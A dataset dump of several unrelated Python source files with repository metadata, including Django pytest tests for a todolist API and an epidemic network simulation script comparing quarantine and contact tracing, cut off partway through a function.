2019-11-21T15:17:01.000Z
Ver = '0.7.3'
13
13
0.461538
4
13
1.5
1
0
0
0
0
0
0
0
0
0
0
0.272727
0.153846
13
1
13
13
0.272727
0
0
0
0
0
0.357143
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
f13762d4600499acd31000ec315081d6b392f111
96
py
Python
web-app/backend/emotion/main/__init__.py
syzroy/4099-Emotion-Analyser
de5b0fc28f97fbe7c55cf50413587fd55ae572ea
[ "MIT" ]
1
2019-09-02T09:18:19.000Z
2019-09-02T09:18:19.000Z
web-app/backend/emotion/main/__init__.py
syzroy/4099-Emotion-Analyser
de5b0fc28f97fbe7c55cf50413587fd55ae572ea
[ "MIT" ]
null
null
null
web-app/backend/emotion/main/__init__.py
syzroy/4099-Emotion-Analyser
de5b0fc28f97fbe7c55cf50413587fd55ae572ea
[ "MIT" ]
1
2020-03-31T22:48:55.000Z
2020-03-31T22:48:55.000Z
from flask import Blueprint blueprint = Blueprint('main', __name__) from . import controllers
16
39
0.78125
11
96
6.454545
0.636364
0.507042
0
0
0
0
0
0
0
0
0
0
0.145833
96
5
40
19.2
0.865854
0
0
0
0
0
0.041667
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0.666667
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
1
0
6
f14527fea38073a7de574084fec0d41b8bb443a3
59
py
Python
handlers/__init__.py
arbaishev/urlshortener-tg-bot
e758a1235f3bb6a5b057cd9f6f9b6ecdc586bc27
[ "MIT" ]
null
null
null
handlers/__init__.py
arbaishev/urlshortener-tg-bot
e758a1235f3bb6a5b057cd9f6f9b6ecdc586bc27
[ "MIT" ]
null
null
null
handlers/__init__.py
arbaishev/urlshortener-tg-bot
e758a1235f3bb6a5b057cd9f6f9b6ecdc586bc27
[ "MIT" ]
null
null
null
from . import basic_commands from . import custom_commands
19.666667
29
0.830508
8
59
5.875
0.625
0.425532
0
0
0
0
0
0
0
0
0
0
0.135593
59
2
30
29.5
0.921569
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
f17e98f8e95a8abbe3aa433b765288baef0cfbc8
6,404
py
Python
tasks/tests/test_todolist_endpoint.py
Shizuku-Asami/todolist
2bbd2f8cc20176e3871945f604135280da606875
[ "MIT" ]
null
null
null
tasks/tests/test_todolist_endpoint.py
Shizuku-Asami/todolist
2bbd2f8cc20176e3871945f604135280da606875
[ "MIT" ]
null
null
null
tasks/tests/test_todolist_endpoint.py
Shizuku-Asami/todolist
2bbd2f8cc20176e3871945f604135280da606875
[ "MIT" ]
null
null
null
import pytest from django.test import Client from rest_framework import status import logging from users.models import User from tasks.models import TodoList, TodoItem LOGGER = logging.getLogger(__name__) @pytest.fixture def login_data(): data = { "email": "testuser@example.com", "password": "12345678", } return data @pytest.fixture def data(): """ Minimal data to create a todolist object in the database. """ data = { "todoitem_todolist": [], "name": "test todolist", "description": "A description for the new todolist", } return data @pytest.fixture def data_extra(): """ Todolist data with todoitems. """ data = { "name": "test todolist", "description": "A description for the new todolist", "todoitem_todolist": [ { "name": "item 1", "description": "easy", "is_done": False, }, ], } return data @pytest.fixture def data_extra1(): """ Todolist data with todoitems. """ data = { "name": "test todolist", "description": "A description for the new todolist", "todoitem_todolist": [ { "name": "item 1", "description": "easy", "is_done": False, }, { "name": "item 2", "description": "medium", "is_done": False, }, ], } return data @pytest.fixture def user(): return User.objects.create_user(email="testuser@example.com", password="12345678") @pytest.fixture def client(): client = Client( enforce_csrf_checks=True, HTTP_USER_AGENT="Mozilla/5.0", ) return client @pytest.fixture @pytest.mark.django_db def auth_client(client, login_data, user): response = client.post("/users/login", login_data) access_token = response.data["tokens"]["access"] headers = {"HTTP_AUTHORIZATION": "Bearer " + access_token} client.defaults = headers return client @pytest.mark.django_db def test_create_todolist_with_minimal_data_returns_http_201_created( auth_client, data, user ): data["user"] = user.id response = auth_client.post("/todolists/", data) assert response.status_code == status.HTTP_201_CREATED @pytest.mark.django_db def test_create_todolist_with_at_least_one_todoitem_returns_http_201_created( auth_client, data_extra, user ): data_extra["user"] = user.id response = auth_client.post("/todolists/", data_extra) assert response.status_code == status.HTTP_201_CREATED @pytest.mark.django_db def test_create_todolist_with_many_todoitems_returns_http_201_created( auth_client, data_extra1, user ): data_extra1["user"] = user.id response = auth_client.post("/todolists/", data_extra1) assert response.status_code == status.HTTP_201_CREATED @pytest.mark.django_db def test_create_todolist_without_todoitems_returns_valid_response( auth_client, data, user ): data["user"] = user.id response = auth_client.post("/todolists/", data) LOGGER.info("Response data: %s", response.data) for key in data.keys(): assert key in response.data.keys() assert data[key] == response.data[key] @pytest.mark.django_db def test_create_todolist_with_one_todoitem_returns_valid_response( auth_client, data_extra, user ): data_extra["user"] = user.id response = auth_client.post("/todolists/", data_extra) LOGGER.info("Response data: %s", response.data) for key in data_extra.keys(): if key == "todoitem_todolist": for i in data_extra[key]: assert i in response.data[key].keys() assert data_extra[key][i] == response.data[key][i] else: assert key in response.data.keys() assert data_extra[key] == response.data[key] @pytest.mark.django_db def test_create_todolist_with_todoitems_returns_valid_response( auth_client, data_extra1, user ): data_extra1["user"] = user.id response = auth_client.post("/todolists/", data_extra1) LOGGER.info("Response data: %s", response.data) for key in data_extra1.keys(): if key == "todoitem_todolist": for i in data_extra1[key]: assert i in response.data[key].keys() assert data_extra1[key][i] == response.data[key][i] else: assert key in response.data.keys() assert data_extra1[key] == response.data[key] @pytest.mark.django_db def test_get_todolist_returns_http_200_ok(auth_client, user): pass @pytest.mark.django_db def test_get_all_todolist_for_current_user(auth_client, user): response = auth_client.get("/todolists/") LOGGER.info("Response data: %s", response.data) @pytest.mark.django_db def test_update_todolist_name_returns_http_200_ok(auth_client, user): pass @pytest.mark.django_db def test_update_todolist_name_returns_updated_todolist(auth_client, user): pass @pytest.mark.django_db def test_update_todolist_description_returns_http_200_ok(auth_client, user): pass @pytest.mark.django_db def test_update_todolist_description_returns_updated_todolist(auth_client, user): pass @pytest.mark.django_db def test_update_todolist_todoitems_returns_http_200_ok(auth_client, user): pass @pytest.mark.django_db def test_update_todolist_todoitems_returns_updated_todolist(auth_client, user): pass @pytest.mark.django_db def test_update_todolist_multiple_fields_returns_http_200_ok(auth_client, user): pass @pytest.mark.django_db def test_update_todolist_multiple_fields_returns_updated_todolist(auth_client, user): pass @pytest.mark.django_db def test_delete_todolist_returns_http_200_ok(auth_client, user): pass @pytest.mark.django_db def test_delete_todolist_removes_todolist_data_from_database(auth_client, client): pass @pytest.mark.django_db def test_user_cannot_create_todolist_for_another_user(auth_client, user): pass @pytest.mark.django_db def test_user_cannot_get_todolist_of_another_user(auth_client, user): pass @pytest.mark.django_db def test_user_cannot_update_todolist_of_another_user(auth_client, user): pass @pytest.mark.django_db def test_user_cannot_delete_todolist_of_another_user(auth_client, user): pass
25.212598
86
0.687851
829
6,404
4.992762
0.13269
0.072481
0.08891
0.100024
0.796328
0.785939
0.746799
0.707659
0.674076
0.637352
0
0.013418
0.20862
6,404
253
87
25.312253
0.803275
0.01827
0
0.612022
0
0
0.106874
0
0
0
0
0.011858
0.071038
1
0.15847
false
0.092896
0.032787
0.005464
0.229508
0
0
0
0
null
0
0
0
0
1
1
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
1
0
0
0
0
0
6
f18d49e62425073162c0a2b27cec8d6f89224cc4
129
py
Python
tests/test_datapublic.py
ConsultingMD/covid-data-public
2b7091f7cc3877df45a7887709e999b0ebdf30ec
[ "MIT" ]
17
2020-03-26T19:40:09.000Z
2021-08-31T04:07:30.000Z
tests/test_datapublic.py
ConsultingMD/covid-data-public
2b7091f7cc3877df45a7887709e999b0ebdf30ec
[ "MIT" ]
78
2020-03-27T23:10:51.000Z
2021-09-20T21:41:27.000Z
tests/test_datapublic.py
ConsultingMD/covid-data-public
2b7091f7cc3877df45a7887709e999b0ebdf30ec
[ "MIT" ]
11
2020-03-29T00:23:44.000Z
2021-02-12T23:36:07.000Z
from covidactnow.datapublic.common_fields import CommonFields def test_import_worked(): assert CommonFields.DATE == "date"
21.5
61
0.79845
15
129
6.666667
0.8
0
0
0
0
0
0
0
0
0
0
0
0.124031
129
5
62
25.8
0.884956
0
0
0
0
0
0.031008
0
0
0
0
0
0.333333
1
0.333333
true
0
0.666667
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
0
1
0
0
6
74b8ab1aaeacf133316533b1f7ae93886ac7521c
71,951
py
Python
do_experiment.py
figlerg/network_tracing
97ee6bbcad1a4ca30736d23ee0c00b0f2a6ae5f2
[ "BSD-3-Clause" ]
null
null
null
do_experiment.py
figlerg/network_tracing
97ee6bbcad1a4ca30736d23ee0c00b0f2a6ae5f2
[ "BSD-3-Clause" ]
null
null
null
do_experiment.py
figlerg/network_tracing
97ee6bbcad1a4ca30736d23ee0c00b0f2a6ae5f2
[ "BSD-3-Clause" ]
null
null
null
import hashlib import os import pickle import matplotlib import matplotlib.pyplot as plt import numpy as np from matplotlib.ticker import FormatStrFormatter import matplotlib as mpl from globals import * from net import Net from tqdm import tqdm import cycler import random random.seed(12345) # Direct input plt.rcParams['text.latex.preamble'] = r"\usepackage{bm} \usepackage{amsmath}" # plt.rcParams['text.latex.preamble']=[r"\usepackage{lmodern}"] # Options params = {'text.usetex': True, 'font.size': 10, 'font.family': 'serif' # 'font.family' : 'lmodern', } plt.rcParams.update(params) columwidth = 251.8 / 72.27 # 251.80688[pt] / 72.27[pt/inch] def estimateQuotientCI(ax, xvalues, mean1, sd1, mean2, sd2, color, mccount, p=95): iters = 2000 lowers = list() uppers = list() percs = [(100 - p) / 2, 100 - (100 - p) / 2] """ Monte Carlo mean 1/N*sum(X_i) implies: V(1/N*sum(X_i))=1/(N^2)*sum(V(X_i))=1/(N^2)*N*V(X)=V(X)/N => Variance of monte carlo mean is 1/N times variance of single model result => SD is 1/sqrt(N) times SD of model result """ sd11 = sd1 / (mccount ** 0.5) sd21 = sd2 / (mccount ** 0.5) for m1, s1, m2, s2 in zip(mean1, sd11, mean2, sd21): quotients = list() for i in range(iters): """ since (sum(X_i)-mu)/(sqrt(N)*sigma) converges towards Normal(0,1) we may assume 1/N*sum(X_i) approx ~ Normal(mu,sigma/sqrt(N)) """ denom = random.normalvariate(m2, s2) if denom <= 0: # truncate normal dist - negative values dont make sense continue nom = random.normalvariate(m1, s1) if nom < 0: # truncate normal dist - negative values dont make sense continue quotients.append(nom / denom) ps = np.percentile(quotients, percs) lowers.append(ps[0]) uppers.append(ps[1]) ax.fill_between(xvalues, lowers, uppers, color=color, alpha=0.2, zorder=-1) # pickling disabled for now, uncomment plot lines for that def simple_experiment_old(n, p, p_i, mc_iterations, max_t, seed=0, mode=None, force_recompute=False, path=None, clustering: float = None, dispersion=None): # this creates the net, runs monte carlo on it and saves the resulting timeseries plot, as well as pickles for net and counts assert not (dispersion and clustering), "Cannot set a dispersion target and " \ "a clustering target at the same time" if dispersion: chosen_epsilon = epsilon_disp else: chosen_epsilon = epsilon_clustering if path: dirname = path else: dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments') # the cache is now tagged with a hash from all important parameters instead of the above. # Any change to the model parameters will certainly trigger a recompute now id_params = ( n, p, p_i, mc_iterations, max_t, seed, mode, clustering, dispersion, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, chosen_epsilon) # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) # disables loading pickled results if force_recompute: # if false, it looks at saved experiments and reuses those net = Net(n=n, p=p, p_i=p_i, max_t=max_t, seed=seed, clustering_target=clustering, dispersion_target=dispersion) counts, sd, achieved_clustering, achieved_disp = net.monte_carlo(mc_iterations, mode=mode) with open(os.path.join(dirname, tag + '_net.p'), 'wb') as f: pickle.dump((net, achieved_clustering, achieved_disp), f) with open(os.path.join(dirname, tag + '_counts.p'), 'wb') as f: pickle.dump((counts, sd), f) else: try: with open(os.path.join(dirname, tag + "_counts.p"), 'rb') as f: counts, sd = pickle.load(f) with open(os.path.join(dirname, tag + "_net.p"), 'rb') as f: net, achieved_clustering, achieved_disp = pickle.load(f) print('Experiment results have been loaded from history.') except FileNotFoundError: net = Net(n=n, p=p, p_i=p_i, max_t=max_t, seed=seed, clustering_target=clustering, dispersion_target=dispersion) counts, sd, achieved_clustering, achieved_disp = net.monte_carlo(mc_iterations, mode=mode) with open(os.path.join(dirname, tag + '_net.p'), 'wb') as f: pickle.dump((net, achieved_clustering, achieved_disp), f) with open(os.path.join(dirname, tag + '_counts.p'), 'wb') as f: pickle.dump((counts, sd), f) exposed = counts[EXP_STATE, :] infected = counts[INF_STATE, :] ep_curve = exposed + infected # compute when the peak happens and what the ratio of infected is then t_peak = np.argmax(ep_curve, axis=0) peak_height = ep_curve[t_peak] / n # compute the ratio of all exposed people at end of sim to the number of indiv. # (also check heuristically whether an equilibrium has been reached recovered = counts[REC_STATE, :] virus_contacts = ep_curve + recovered sensitivity = max(1, n / 100) # increasing divisor makes this more sensitive equilib_flag = abs( virus_contacts[-1] - virus_contacts[-2]) < sensitivity # just a heuristic, see whether roc is low period_prevalence = virus_contacts[-1] / n return net, counts, sd, t_peak, peak_height, equilib_flag, period_prevalence, achieved_clustering, achieved_disp from do_experiment_parallel import \ simple_experiment # this is the new, parallel version of the above function. By Martin! def vary_p(res, n, p_i, mc_iterations, max_t, interval=(0, 1), seed=0, mode=None, force_recompute=False, path=None): # here I want to systematically check what varying the edge probability does. Should return something like a 1d heatmap? # return value should use one of the values t_peak, peak_height, equilib_flag, period_prevalence peak_times = np.ndarray(res) mean_peak_heights = np.ndarray(res) mean_period_prevalences = np.ndarray(res) sd_peak_heights = np.ndarray(res) sd_period_prevalences = np.ndarray(res) ps = np.linspace(interval[0], interval[1], endpoint=True, num=res) for i, p in enumerate(ps): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, clustering, dispersion = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode=mode, force_recompute=force_recompute, path=path) peak_times[i] = t_peak mean_peak_heights[i] = mean_peak sd_peak_heights[i] = sd_peak mean_period_prevalences[i] = mean_prevalence sd_period_prevalences[i] = sd_prevalence fig, axes = plt.subplots(3, 1, sharex=True, figsize=(16 * 1.5, 9 * 1.5)) ax1, ax2, ax3 = axes if mode: ax1.set_title(mode) else: ax1.set_title('vanilla') ax1.plot(ps, peak_times) # ax1.set_xlabel('p') ax1.set_ylabel('Peak time') ax2.plot(ps, mean_peak_heights) # ax2.set_xlabel('p') ax2.set_ylabel('Peak prevalence') ax3.plot(ps, mean_period_prevalences) ax3.set_ylabel('Fraction of affected') ax3.set_xlabel('p') # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] ax3.set_xticks(ps[1:-2], minor=True) ax3.set_xticks([interval[0], interval[1]]) plt.tick_params( axis='x', # changes apply to the x-axis which='minor', # both major and minor ticks are affected # bottom=False, # ticks along the bottom edge are off # top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off # plt.xticks([interval[0],interval[1]]) if mode: fig.savefig(os.path.join(path, 'pvaried_n{}_p{}_{}'.format( n, str(interval[0]) + 'to' + str(interval[1]), mode) + '.png')) else: fig.savefig(os.path.join(path, 'pvaried_n{}_p{}'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.png')) def vary_p_plot_cache(res, n, p_i, mc_iterations, max_t, interval=(0, 1), seed=0, force_recompute=False, path=None): # utility function that loads all the pickles (or runs them first) and plots the three scenarios # is a modified copy of vary_p ! peak_times = np.ndarray(res) peak_heights = np.ndarray(res) period_prevalences = np.ndarray(res) peak_times_q = np.ndarray(res) peak_heights_q = np.ndarray(res) period_prevalences_q = np.ndarray(res) peak_times_t = np.ndarray(res) peak_heights_t = np.ndarray(res) period_prevalences_t = np.ndarray(res) peak_heights_sd = np.ndarray(res) peak_heights_q_sd = np.ndarray(res) peak_heights_t_sd = np.ndarray(res) period_prevalences_sd = np.ndarray(res) period_prevalences_q_sd = np.ndarray(res) period_prevalences_t_sd = np.ndarray(res) ps = np.linspace(interval[0], interval[1], endpoint=True, num=res) # all 3 modes for i, p in tqdm(enumerate(ps), total=res, desc='Vanilla'): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + res, mode=None, force_recompute=force_recompute, path=path) peak_times[i] = t_peak peak_heights[i] = mean_peak peak_heights_sd[i] = sd_peak period_prevalences[i] = mean_prevalence period_prevalences_sd[i] = sd_prevalence for i, p in tqdm(enumerate(ps), total=res, desc='Quarantine'): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + 2 * res, mode='quarantine', force_recompute=force_recompute, path=path) peak_times_q[i] = t_peak peak_heights_q[i] = mean_peak peak_heights_q_sd[i] = sd_peak period_prevalences_q[i] = mean_prevalence period_prevalences_q_sd[i] = sd_prevalence for i, p in tqdm(enumerate(ps), total=res, desc='Tracing'): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + 3 * res, mode='tracing', force_recompute=force_recompute, path=path) peak_times_t[i] = t_peak peak_heights_t[i] = mean_peak peak_heights_t_sd[i] = sd_peak period_prevalences_t[i] = mean_prevalence period_prevalences_t_sd[i] = sd_prevalence fig, axes = plt.subplots(3, 1, sharex=True, figsize=(14, 14 / 16 * 9)) ax1, ax2, ax3 = axes ax1.plot(ps, peak_times, ps, peak_times_q, ps, peak_times_t) ax1.set_ylabel('Peak time') ax2.plot(ps, peak_heights, ps, peak_heights_q, ps, peak_heights_t) ax2.set_ylabel('Peak prevalence') ax3.plot(ps, period_prevalences, ps, period_prevalences_q, ps, period_prevalences_t) ax3.set_ylabel('Fraction of affected') ax3.set_xlabel('p') ax3.set_xticks(ps[1:-2], minor=True) ax3.set_xticks([interval[0], interval[1]]) plt.legend(['Vanilla', 'Quarantine', 'Tracing']) plt.tick_params( axis='x', which='minor', # bottom=False, # ticks along the bottom edge are off # top=False, # ticks along the top edge are off labelbottom=False) # labels along the bottom edge are off # plt.xticks([interval[0],interval[1]]) parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'pvaried_n{}_mc{}_{}'.format(n, mc_iterations, 'comp') + '.png'), bbox_inches='tight') # this feels pretty uninteresting: def vary_p_i(res, n, p, mc_iterations, max_t, seed=0, mode=None, force_recompute=False, path=None): # here I want to systematically check what varying the edge probability does. Should return something like a 1d heatmap? # return value should use one of the values t_peak, peak_height, equilib_flag, period_prevalence peak_times = np.ndarray(res) peak_heights = np.ndarray(res) peak_heights_sd = np.ndarray(res) # flags = np.ndarray(res) period_prevalences = np.ndarray(res) period_prevalences_sd = np.ndarray(res) p_is = np.linspace(0, 1, endpoint=True, num=res) for i, p_inf in enumerate(p_is): net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_inf, mc_iterations, max_t, seed=seed + i, mode=mode, force_recompute=force_recompute, path=path) # TODO seed inside simple_experiment is constant, think about whether that's ok! peak_times[i] = t_peak peak_heights[i] = mean_peak peak_heights_sd[i] = sd_peak period_prevalences[i] = mean_prevalence period_prevalences_sd[i] = sd_prevalence fig, axes = plt.subplots(3, 1, sharex=True, figsize=(16 * 1.5, 9 * 1.5)) # fig.subplots_adjust(wspace = 0.5) ax1, ax2, ax3 = axes ax1.plot(p_is, peak_times) # ax1.set_xlabel('p') ax1.set_ylabel('peak-times') ax2.plot(p_is, peak_heights) # ax2.set_xlabel('p') ax2.set_ylabel('peak-height') ax3.plot(p_is, period_prevalences) # ax3.set_xlabel('p') ax3.set_ylabel('percentage of affected') ax3.set_xlabel('infection probability') ax3.set_xticks(p_is) # plt.show() if mode: fig.savefig(os.path.join(path, 'pivaried_n{}_p{}_{}'.format(n, p, mode) + '.png')) else: fig.savefig(os.path.join(path, 'pivaried_n{}_p{}'.format(n, p) + '.png')) def vary_C(res, n, p, p_i, mc_iterations, max_t, interval=None, seed=0, mode=None, force_recompute=False, path=None): # measure effect of clustering coeff on tracing effectiveness if not interval: # THEORY: the average clustering coeff of erdos renyi networks is p! # so I test around that to see what changed interval = (0.5 * p, 10 * p) peak_times = np.ndarray(res) peak_heights = np.ndarray(res) peak_heights_sd = np.ndarray(res) period_prevalences = np.ndarray(res) period_prevalences_sd = np.ndarray(res) Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res) unsuccessful_flag = [] for i, C in tqdm(enumerate(Cs), total=res): try: net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode=mode, force_recompute=force_recompute, path=path, clustering=C) peak_times[i] = t_peak peak_heights[i] = mean_peak peak_heights_sd[i] = sd_peak period_prevalences[i] = mean_prevalence period_prevalences_sd[i] = sd_prevalence # Cs[i] = net.final_cluster_coeff # in the end I want to plot the actual coeff, not the target # should specify this in the paper except AssertionError: print('Clustering target not reached') unsuccessful_flag.append(i) peak_times[i] = np.nan peak_heights[i] = np.nan peak_heights_sd[i] = np.nan period_prevalences[i] = np.nan period_prevalences_sd[i] = np.nan dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache') id_params = ( n, p, p_i, mc_iterations, max_t, seed, mode, interval, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, epsilon_disp, 'disp') # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) with open(os.path.join(dirname, tag + '_metrics.p'), 'wb') as f: out = [Cs, unsuccessful_flag, peak_times, peak_heights, period_prevalences] pickle.dump(out, f) fig, axes = plt.subplots(3, 1, sharex=True, figsize=(14, 14 / 16 * 9)) # fig.subplots_adjust(wspace = 0.5) ax1, ax2, ax3 = axes colordict = {'vanilla': 'C0', 'quarantine': 'C1', 'tracing': 'C2'} if mode: ax1.set_title(mode) else: ax1.set_title('Vanilla') ax1.plot(Cs, peak_times, colordict[mode]) ax1.set_ylabel('Peak time') ax2.plot(Cs, peak_heights, colordict[mode]) ax2.set_ylabel('Peak prevalence') ax3.plot(Cs, period_prevalences, colordict[mode]) ax3.set_ylabel('Fraction of affected') ax3.set_xlabel('C(g)') # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] ax3.set_xticks(Cs[1:-1], minor=True) ax3.set_xticks([interval[0], interval[1]]) # plt.tick_params( # axis='x', # changes apply to the x-axis # which='minor', # both major and minor ticks are affected # # bottom=False, # ticks along the bottom edge are off # # top=False, # ticks along the top edge are off # labelbottom=False) # labels along the bottom edge are off # plt.xticks([interval[0],interval[1]]) if mode: parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_p{}_{}'.format( n, str(interval[0]) + 'to' + str(interval[1]), mode) + '.png'), bbox_inches='tight') else: parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'Cvaried_n{}_C{}'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight') return out # Cs, unsuccessful_flags, times, peaks, period_prev def vary_disp(res, n, p, p_i, mc_iterations, max_t, interval=None, seed=0, mode=None, force_recompute=False, path=None): # measure effect of clustering coeff on tracing effectiveness if not interval: # THEORY: the average clustering coeff of erdos renyi networks is p! # so I test around that to see what changed interval = (0.5 * p, 10 * p) peak_times = np.ndarray(res) peak_heights = np.ndarray(res) peak_heights_sd = np.ndarray(res) period_prevalences = np.ndarray(res) period_prevalences_sd = np.ndarray(res) Ds = np.linspace(interval[0], interval[1], endpoint=True, num=res) unsuccessful_flag = [] for i, D in tqdm(enumerate(Ds), total=res, desc='Varying dispersion values'): try: net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode=mode, force_recompute=force_recompute, path=path, dispersion=D) peak_times[i] = t_peak peak_heights[i] = mean_peak peak_heights_sd[i] = sd_peak period_prevalences[i] = mean_prevalence period_prevalences_sd[i] = sd_prevalence print('last_disp{}, target_disp{}'.format(net.final_dispersion, D)) # Cs[i] = net.final_cluster_coeff # in the end I want to plot the actual coeff, not the target # should specify this in the paper except AssertionError: print('Dispersion target not reached') unsuccessful_flag.append(i) peak_times[i] = np.nan peak_heights[i] = np.nan peak_heights_sd[i] = np.nan period_prevalences[i] = np.nan period_prevalences_sd[i] = np.nan dirname_parent = os.path.dirname(__file__) dirname = os.path.join(dirname_parent, 'Experiments', 'Paper', 'Cache') id_params = ( n, p, p_i, mc_iterations, max_t, mode, seed, interval, t_i, t_c, t_r, t_d, t_t, p_q, p_t, quarantine_time, resolution, epsilon_disp) # normal hashes are salted between runs -> use something that is persistent tag = str(hashlib.md5(str(id_params).encode('utf8')).hexdigest()) with open(os.path.join(dirname, tag + '_metrics.p'), 'wb') as f: out = [Ds, unsuccessful_flag, peak_times, peak_heights, period_prevalences] pickle.dump(out, f) fig, axes = plt.subplots(3, 1, sharex=True, figsize=(14, 14 / 16 * 9)) # fig.subplots_adjust(wspace = 0.5) ax1, ax2, ax3 = axes colordict = {'vanilla': 'C0', 'quarantine': 'C1', 'tracing': 'C2'} if mode: ax1.set_title(mode) else: ax1.set_title('Vanilla') ax1.plot(Ds, peak_times, colordict[mode]) ax1.set_ylabel('Peak time') ax2.plot(Ds, peak_heights, colordict[mode]) ax2.set_ylabel('Peak prevalence') ax3.plot(Ds, period_prevalences, colordict[mode]) ax3.set_ylabel('Fraction of affected') ax3.set_xlabel('C(g)') # labels = [interval[0],] + list(['' for i in range(len(ps)-2)]) + [interval[1],] ax3.set_xticks(Ds[1:-1], minor=True) ax3.set_xticks([interval[0], interval[1]]) # plt.tick_params( # axis='x', # changes apply to the x-axis # which='minor', # both major and minor ticks are affected # # bottom=False, # ticks along the bottom edge are off # # top=False, # ticks along the top edge are off # labelbottom=False) # labels along the bottom edge are off # plt.xticks([interval[0],interval[1]]) if mode: parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'dispvaried_n{}_p{}_{}'.format( n, str(interval[0]) + 'to' + str(interval[1]), mode) + '.png'), bbox_inches='tight') else: parent = os.path.dirname(path) fig.savefig(os.path.join(parent, 'Pics', 'dispvaried_n{}_C{}'.format( n, str(interval[0]) + 'to' + str(interval[1])) + '.png'), bbox_inches='tight') return out # Cs, unsuccessful_flags, times, peaks, period_prev def vary_C_comp(res, n, p, p_i, mc_iterations, max_t, interval=None, seed=0, force_recompute=False, path=None): # measure effect of clustering coeff on tracing effectiveness if not interval: # THEORY: the average clustering coeff of erdos renyi networks is p! # so I test around that to see what changed interval = (0.5 * p, 10 * p) Cs = np.linspace(interval[0], interval[1], endpoint=True, num=res) peak_times_1 = np.ndarray(res) peak_heights_1 = np.ndarray(res) peak_heights_sd_1 = np.ndarray(res) period_prevalences_1 = np.ndarray(res) period_prevalences_sd_1 = np.ndarray(res) unsuccessful_flags_1 = [] for i, C in tqdm(enumerate(Cs), total=res, desc='Vanilla'): try: net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i, mode='vanilla', force_recompute=force_recompute, path=path, clustering=C) peak_times_1[i] = t_peak peak_heights_1[i] = mean_peak peak_heights_sd_1[i] = sd_peak period_prevalences_1[i] = mean_prevalence period_prevalences_sd_1[i] = sd_prevalence # Cs[i] = net.final_cluster_coeff # in the end I want to plot the actual coeff, not the target # should specify this in the paper except AssertionError: print('Clustering target not reached') unsuccessful_flags_1.append(i) peak_times_1[i] = np.nan peak_heights_1[i] = np.nan peak_heights_sd_1[i] = np.nan period_prevalences_1[i] = np.nan period_prevalences_sd_1[i] = np.nan peak_times_2 = np.ndarray(res) peak_heights_2 = np.ndarray(res) peak_heights_sd_2 = np.ndarray(res) period_prevalences_2 = np.ndarray(res) period_prevalences_sd_2 = np.ndarray(res) unsuccessful_flags_2 = [] for i, C in tqdm(enumerate(Cs), total=res, desc='Quarantine'): try: net, mean_counts, sd_counts, t_peak, mean_peak, sd_peak, mean_prevalence, sd_prevalence, equilib_flag, achieved_clustering, achieved_disp = \ simple_experiment(n, p, p_i, mc_iterations, max_t, seed=seed + i + res, mode='quarantine', force_recompute=force_recompute, path=path, clustering=C) peak_times_2[i] = t_peak peak_heights_2[i] = mean_peak peak_heights_sd_2[i] = sd_peak period_prevalences_2[i] = mean_prevalence period_prevalences_sd_2[i] = sd_prevalence # Cs[i] = net.final_cluster_coeff # in the end 